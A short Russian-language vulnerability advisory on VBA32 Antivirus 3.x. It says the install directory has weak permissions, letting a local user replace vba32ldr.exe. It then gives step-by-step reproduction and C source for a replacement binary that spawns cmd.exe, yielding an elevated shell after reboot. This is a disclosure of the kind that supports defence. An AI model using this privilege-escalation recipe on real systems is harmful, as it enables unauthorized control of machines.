Программа: VBA32 Antivirus 3.x
Уязвимость позволяет локальному злоумышленнику выполнить вредоносные действия с повышенными привилегиями на целевой системе. Уязвимость существует из-за того, что приложение не правильно устанавливает права доступа на инсталляционную директорию VBA32. Атакующий может заменить файлы в директории VBA32, что позволит ему повысить свои привилегии на целевой системе.
Пример:
- Войти в систему как LUA пользователь
- Переименовать vba32ldr.exe в vba32ldr.exe.BAK
- Скопировать program.exe в Vba32 инсталляционную директорию
- Переименовать program.exe в vba32ldr.exe
- Перезагрузить операционную систему
- "rootshell" 😉
#Исходный код для program.exe:
#include <stdio.h>
int main()
{
system("cmd.exe");
return 0;
}
